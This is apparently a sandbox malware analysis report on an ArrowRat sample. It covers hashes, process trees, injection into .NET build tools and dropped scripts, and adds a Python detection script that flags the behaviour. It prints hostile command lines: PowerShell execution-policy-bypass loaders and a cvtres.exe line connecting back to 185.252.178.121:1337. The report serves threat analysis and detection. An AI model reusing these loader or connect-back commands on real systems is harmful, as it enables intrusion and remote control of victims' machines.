Analysis Overview
SHA256
5295a4068b1de47c3385bd1608f84ef51b4bb8b6e0f867af7797a199da9378dc
Threat Level: Known bad
The file 5ff1aded34d5d6f0635f6f9861436886.bin was found to be: Known bad.
Malicious Activity Summary
ArrowRat
Checks computer location settings
Suspicious use of SetThreadContext
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Modifies registry class
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2023-05-19 01:26
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2023-05-19 01:26
Reported
2023-05-19 01:28
Platform
win7-20230220-en
Max time kernel
31s
Max time network
34s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\abf2dcd61f4a9717e372e32dcfcb02831e51130f4a91fa87bb7954785db435fd.ps1
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\Unlimited\ISO\Binnot.vbs"
C:\Windows\System32\cmd.exe
cmd /c ""C:\ProgramData\Unlimited\ISO\Binnot.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\Unlimited\ISO\Binnot.ps1
Network
Files
memory/2040-58-0x000000001B290000-0x000000001B572000-memory.dmp
memory/2040-59-0x00000000022E0000-0x00000000022E8000-memory.dmp
memory/2040-60-0x00000000028F0000-0x0000000002970000-memory.dmp
memory/2040-61-0x00000000028F0000-0x0000000002970000-memory.dmp
memory/2040-62-0x00000000028F0000-0x0000000002970000-memory.dmp
memory/2040-69-0x00000000028F0000-0x0000000002970000-memory.dmp
C:\ProgramData\Unlimited\ISO\Binnot.vbs
| MD5 | 8444901b66d6f83f3a684f1b44646868 |
| SHA1 | 69c9c40aef3734959b4ce5f07005bf13c07646f9 |
| SHA256 | cfeaafc87ceec9986f37f6a42ecfa39260f98c951404df95da5e074141add5da |
| SHA512 | 7493b0d40c9c914c8968b42752b1d14d415e7bccff07f9bf2ab976d77517e12a456f142ee786527c4e536fab3e4156b21ce353f51f5925bbc405937ad7929bbb |
C:\ProgramData\Unlimited\ISO\Binnot.bat
| MD5 | f1d747a7825a5db756d428a5254d244e |
| SHA1 | 7db56fe57492bd856c787cd2a836eff4f2ce5e01 |
| SHA256 | 5863b76caee43b2f1efdd2322f2e5731b1537d1deeb35e860cd75a8304fe4ddf |
| SHA512 | 4b1f63df96b8f9e2a381855974b2efab5bd48ae342b1e29a51661d0514ba6f8e62d23e3e58a9a9f978d39880ab03a9b9bf72ab52a546a965da20daa18c4d246d |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | bc56171e5c5e1d408145ec3fc8b3cdc4 |
| SHA1 | f22979ca4218867b13c697eecd267991949a0d9d |
| SHA256 | 7e835320659002c243a14aa35f98b9b244d6191ec4d1fe05dd75834bf396656b |
| SHA512 | 280b322b3a09bc7ed01288c962b180d8436d21eb41d1d8f10f36a2442564b82225b568a9bbf4ba6d84ef8c2b5587230a90004f3ae085708abff195e96691f61b |
memory/1328-79-0x000000001B1D0000-0x000000001B4B2000-memory.dmp
memory/1328-80-0x0000000001EC0000-0x0000000001EC8000-memory.dmp
C:\ProgramData\Unlimited\ISO\Binnot.ps1
| MD5 | 58ef18971b1520648e0c6d67036251ff |
| SHA1 | 68bd1ee657ff233f6a1ee453914aaecdeb845284 |
| SHA256 | 226b14799e579e28954937fa3ffdb7d0e5dcd10360b35c329a7246a23be4b4b3 |
| SHA512 | 9b7f04aca4b3e2af5aafdc9ea30c1722722d668078bea8b0aaa2394d0cb50ac75716fb9173d4084bd5a9cfaa279bd94404b64c140532daa5b3bdd66842f332d2 |
memory/1328-82-0x0000000002754000-0x0000000002757000-memory.dmp
memory/1328-83-0x000000000275B000-0x0000000002792000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2023-05-19 01:26
Reported
2023-05-19 01:28
Platform
win10v2004-20230220-en
Max time kernel
150s
Max time network
154s
Command Line
Signatures
ArrowRat
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1732 set thread context of 3244 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe |
| PID 3244 set thread context of 1620 | N/A | C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1675742406-747946869-1029867430-1000\{B05CD583-21C4-4B88-AD2A-A7B36E5F950D} | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000_Classes\Local Settings | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\abf2dcd61f4a9717e372e32dcfcb02831e51130f4a91fa87bb7954785db435fd.ps1
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\Unlimited\ISO\Binnot.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Unlimited\ISO\Binnot.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\Unlimited\ISO\Binnot.ps1
C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\ProgramData\Unlimited\ISO\Unlimited.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Unlimited\ISO\Unlimited.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\Unlimited\ISO\Unlimited.ps1
C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client 185.252.178.121 1337 qCDAaGyIF
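The process list above runs the PowerShell -> WScript -> cmd -> PowerShell loader chain twice, then hollows two .NET Framework build tools (the SetThreadContext table records powershell.exe writing into aspnet_compiler.exe, and aspnet_compiler.exe writing into cvtres.exe), and the final cvtres.exe command line carries a connect-back address and port that the network table below never shows a connection to. The following detection pass is an added example, not part of the sandbox report: it runs over event records constructed by hand from this report's Processes and SetThreadContext tables. PIDs 1732, 3244 and 1620 are the ones the SetThreadContext table gives; 3780 and 4584 are read off the memory-dump names and are an assumption; the 90xx PIDs are placeholders; the rule names are the author's own.

```python
"""Detection pass over the behavioral2 process tree reported above.

Added example, not part of the sandbox report. Event records are constructed
from the report's "Processes" and "SetThreadContext" tables. PIDs 1732, 3244
and 1620 come from the SetThreadContext table; 3780 and 4584 are read off the
memory-dump names (an assumption); the 90xx PIDs are placeholders.
"""
import re
from dataclasses import dataclass, field


@dataclass
class ProcEvent:
    pid: int
    image: str
    cmdline: str
    ctx_targets: list = field(default_factory=list)  # PIDs this process called SetThreadContext on


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
WSCRIPT = r"C:\Windows\System32\WScript.exe"
CMD = r"C:\Windows\system32\cmd.exe"
ASPNET = r"C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe"
CVTRES = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"

EVENTS = [  # constructed from the report's process list, in report order
    ProcEvent(3780, PS, r"powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\abf2dcd61f4a9717e372e32dcfcb02831e51130f4a91fa87bb7954785db435fd.ps1"),
    ProcEvent(9001, WSCRIPT, r'"C:\Windows\System32\WScript.exe" "C:\ProgramData\Unlimited\ISO\Binnot.vbs"'),
    ProcEvent(9002, CMD, r'C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Unlimited\ISO\Binnot.bat" "'),
    ProcEvent(4584, PS, r"PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\Unlimited\ISO\Binnot.ps1"),
    ProcEvent(9003, WSCRIPT, r'C:\Windows\System32\WScript.exe "C:\ProgramData\Unlimited\ISO\Unlimited.vbs"'),
    ProcEvent(9004, CMD, r'C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Unlimited\ISO\Unlimited.bat" "'),
    ProcEvent(1732, PS, r"PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\Unlimited\ISO\Unlimited.ps1", ctx_targets=[3244]),
    ProcEvent(3244, ASPNET, r'"C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe"', ctx_targets=[1620]),
    ProcEvent(1620, CVTRES, r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client 185.252.178.121 1337 qCDAaGyIF'),
]

WRITABLE_DIRS = ("c:\\programdata\\", "\\appdata\\local\\temp\\")
DOTNET_FX = "\\microsoft.net\\framework\\"
C2_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\s+(\d{1,5})\b")


def _args_after_image(cmdline):
    """Split off the image token (quoted or bare) and return the argv tail."""
    s = cmdline.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[end + 1:].split() if end != -1 else []
    return s.split()[1:]


def flag_powershell(ev):
    """PowerShell with the execution policy bypassed and a script taken from a
    user-writable directory (ProgramData or the user's Temp), as in the report."""
    cl = ev.cmdline.lower()
    if (ev.image.lower().endswith("powershell.exe") and "-executionpolicy" in cl
            and "bypass" in cl and any(d in cl for d in WRITABLE_DIRS)):
        return "powershell_bypass_script_from_writable_dir"
    return None


def flag_dotnet_lolbin(ev):
    """aspnet_compiler.exe and cvtres.exe are build-time tools. Launched with no
    arguments, or with arguments that are not compiler switches, they are
    hollow targets rather than a build, which is what the report shows."""
    if DOTNET_FX not in ev.image.lower():
        return None
    args = _args_after_image(ev.cmdline)
    if not args:
        return "dotnet_fx_binary_without_arguments"
    if not any(a.startswith(("/", "-")) for a in args):
        return "dotnet_fx_binary_with_non_switch_arguments"
    return None


def extract_c2(ev):
    """Pull an '<ip> <port>' pair out of a command line; here it yields the
    connect-back address the cvtres.exe line carries."""
    for m in C2_RE.finditer(ev.cmdline):
        ip, port = m.group(1), int(m.group(2))
        if all(int(o) <= 255 for o in ip.split(".")) and 0 < port < 65536:
            return ip, port
    return None


def injection_chains(events):
    """Follow SetThreadContext edges from each root (a process that injects but
    was not itself injected into) to the last hop, guarding against cycles."""
    by_pid = {e.pid: e for e in events}
    targets = {t for e in events for t in e.ctx_targets}
    chains = []
    for root in events:
        if not root.ctx_targets or root.pid in targets:
            continue
        chain, cur, seen = [root.pid], root, {root.pid}
        while cur.ctx_targets and cur.ctx_targets[0] in by_pid and cur.ctx_targets[0] not in seen:
            cur = by_pid[cur.ctx_targets[0]]
            chain.append(cur.pid)
            seen.add(cur.pid)
        chains.append(chain)
    return chains


def triage(events):
    """Apply every rule to every event; return rule hits, injection chains and C2 candidates."""
    findings, c2 = [], []
    for ev in events:
        for rule in (flag_powershell, flag_dotnet_lolbin):
            hit = rule(ev)
            if hit:
                findings.append((hit, ev.pid))
        ioc = extract_c2(ev)
        if ioc:
            c2.append(ioc)
    return {"findings": findings, "chains": injection_chains(events), "c2": c2}


if __name__ == "__main__":
    result = triage(EVENTS)
    for rule, pid in result["findings"]:
        print(f"{pid:>5}  {rule}")
    for chain in result["chains"]:
        print("SetThreadContext chain:", " -> ".join(str(p) for p in chain))
    for ip, port in result["c2"]:
        print(f"connect-back candidate: {ip}:{port}")
```

The three PowerShell launches, the argument-less aspnet_compiler.exe, the cvtres.exe with non-switch arguments, and the 1732 -> 3244 -> 1620 SetThreadContext chain all fire from these records alone; the extracted 185.252.178.121:1337 is an IOC to hunt for in egress logs precisely because the sandbox's own network capture does not contain it.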
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.3.197.209.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.202.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.150.43.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.103.197.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 113.66.64.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 250.255.255.239.in-addr.arpa | udp |
| IE | 13.69.239.73:443 | N/A | tcp |
| US | 8.8.8.8:53 | 1.208.79.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.232.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 126.143.241.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.232.18.117.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.134.221.88.in-addr.arpa | udp |
| NL | 8.238.20.126:80 | N/A | tcp |
| NL | 8.238.20.126:80 | N/A | tcp |
| NL | 8.238.20.126:80 | N/A | tcp |
| US | 8.8.8.8:53 | 254.166.241.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 42.134.221.88.in-addr.arpa | udp |
| NL | 173.223.113.164:443 | N/A | tcp |
| US | 8.8.8.8:53 | 9.143.101.95.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kl0dbiph.qjs.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3780-133-0x000001FC31060000-0x000001FC31082000-memory.dmp
memory/3780-143-0x000001FC49500000-0x000001FC49510000-memory.dmp
memory/3780-144-0x000001FC49500000-0x000001FC49510000-memory.dmp
C:\ProgramData\Unlimited\ISO\Binnot.vbs
| MD5 | 8444901b66d6f83f3a684f1b44646868 |
| SHA1 | 69c9c40aef3734959b4ce5f07005bf13c07646f9 |
| SHA256 | cfeaafc87ceec9986f37f6a42ecfa39260f98c951404df95da5e074141add5da |
| SHA512 | 7493b0d40c9c914c8968b42752b1d14d415e7bccff07f9bf2ab976d77517e12a456f142ee786527c4e536fab3e4156b21ce353f51f5925bbc405937ad7929bbb |
C:\ProgramData\Unlimited\ISO\Binnot.bat
| MD5 | f1d747a7825a5db756d428a5254d244e |
| SHA1 | 7db56fe57492bd856c787cd2a836eff4f2ce5e01 |
| SHA256 | 5863b76caee43b2f1efdd2322f2e5731b1537d1deeb35e860cd75a8304fe4ddf |
| SHA512 | 4b1f63df96b8f9e2a381855974b2efab5bd48ae342b1e29a51661d0514ba6f8e62d23e3e58a9a9f978d39880ab03a9b9bf72ab52a546a965da20daa18c4d246d |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 223bd4ae02766ddc32e6145fd1a29301 |
| SHA1 | 900cfd6526d7e33fb4039a1cc2790ea049bc2c5b |
| SHA256 | 1022ec2fed08ff473817fc53893e192a8e33e6a16f3d2c8cb6fd37f49c938e1e |
| SHA512 | 648cd3f8a89a18128d2b1bf960835e087a74cdbc783dbfcc712b3cb9e3a2e4f715e534ba2ef81d89af8f60d4882f6859373248c875ceb26ad0922e891f2e74cc |
memory/4584-158-0x0000014FDB660000-0x0000014FDB670000-memory.dmp
memory/4584-159-0x0000014FDB660000-0x0000014FDB670000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 27fdb1beb89b56345e585d480be3026b |
| SHA1 | 2626e41ca27668518d01c04e1579f77027ff31a1 |
| SHA256 | ef8cd66cc241c6d899919ae6f8369334b20202bd4ad49acfa546d29300c533d2 |
| SHA512 | bd8208c8763ad8a6c25b6363b8e0e2a3c694e4e0cabfe4ce5d40945bd1f4274b7da976997f825e95c4455bf6b2e20b5bd960609b172f7c70d3521cb2ab24d49a |
C:\ProgramData\Unlimited\ISO\Binnot.ps1
| MD5 | 58ef18971b1520648e0c6d67036251ff |
| SHA1 | 68bd1ee657ff233f6a1ee453914aaecdeb845284 |
| SHA256 | 226b14799e579e28954937fa3ffdb7d0e5dcd10360b35c329a7246a23be4b4b3 |
| SHA512 | 9b7f04aca4b3e2af5aafdc9ea30c1722722d668078bea8b0aaa2394d0cb50ac75716fb9173d4084bd5a9cfaa279bd94404b64c140532daa5b3bdd66842f332d2 |
memory/4584-171-0x0000014FDB660000-0x0000014FDB670000-memory.dmp
memory/4584-172-0x0000014FDB660000-0x0000014FDB670000-memory.dmp
C:\ProgramData\Unlimited\ISO\Unlimited.vbs
| MD5 | c281573a4f6f6ac5b06f2e9436400093 |
| SHA1 | c2699e56b7c26ac9cdfe1f500b49151b69bd6ad8 |
| SHA256 | 3c312f2547fbc4a3ffe5c1b6d91c03494d7653fd758d886473f2ae6656de11f7 |
| SHA512 | 76aed1be4b48d2fc019c9136eb74b3a96b56b89c74cb3b3347f8eefc592fee24a2a94ea3babd4b394080c7663864781c89afe761e59f8d65aed147d1ed422026 |
C:\ProgramData\Unlimited\ISO\Unlimited.bat
| MD5 | eff64d56c40c54a1f9891d7a6ad54899 |
| SHA1 | dbaf9a4aeb8484690d6118155d59158598f0799a |
| SHA256 | c846b192c5dc974c6d63024a06d4c31b2f7c8baa61af133e5b00009b68df86e2 |
| SHA512 | c89f82c7807b947e10f82740c01d5cb996e95c4a6e79375eee6b981d0ed911d31537e964d0cefef874c7e12f9f4baf237f0f9ed44de866abd3c8030a25b7cc83 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 2cacea4e19ddf5755e70346cc1cbe27b |
| SHA1 | d4f7c2950f951857da18cfec490370152983e121 |
| SHA256 | 5488c6f47e2e55addf07b920f0ce43ed970515193c4cb1ffb845a9b441bcd9ad |
| SHA512 | 445497cefd12a10e19272b51028a6b19d039b578a2e4d1f4c7f4c4bed447c55b1cd23453e9bed9307aaeb7b57ea8c721d1884eaaafa422df4607cfe3a75f54f7 |
memory/1732-186-0x000002B7CC7C0000-0x000002B7CC7D0000-memory.dmp
memory/1732-187-0x000002B7CC7C0000-0x000002B7CC7D0000-memory.dmp
memory/1732-188-0x000002B7CC7C0000-0x000002B7CC7D0000-memory.dmp
C:\ProgramData\Unlimited\ISO\Unlimited.ps1
| MD5 | e1bb0ce912e111d3b891de922e21a739 |
| SHA1 | 8ae8856cb82f3340b2b2b1a06b3123b549005549 |
| SHA256 | 5f79c8a3a6ff96ae8ccf96dfc486ae1f5e8edeabb663e6f90be89aeb727457cc |
| SHA512 | bbb85cb9160a52d1bf464b7b459caaf9f808407031c423790be65e820fc8cce39c99c6096110228e8a8b33ddf5bff75350cbda2f6b01fc500f5169a4142528bf |
memory/3244-190-0x0000000000400000-0x000000000042C000-memory.dmp
memory/3244-192-0x0000000005460000-0x0000000005A04000-memory.dmp
memory/3244-193-0x0000000004F50000-0x0000000004FEC000-memory.dmp
memory/1620-194-0x0000000000400000-0x0000000000418000-memory.dmp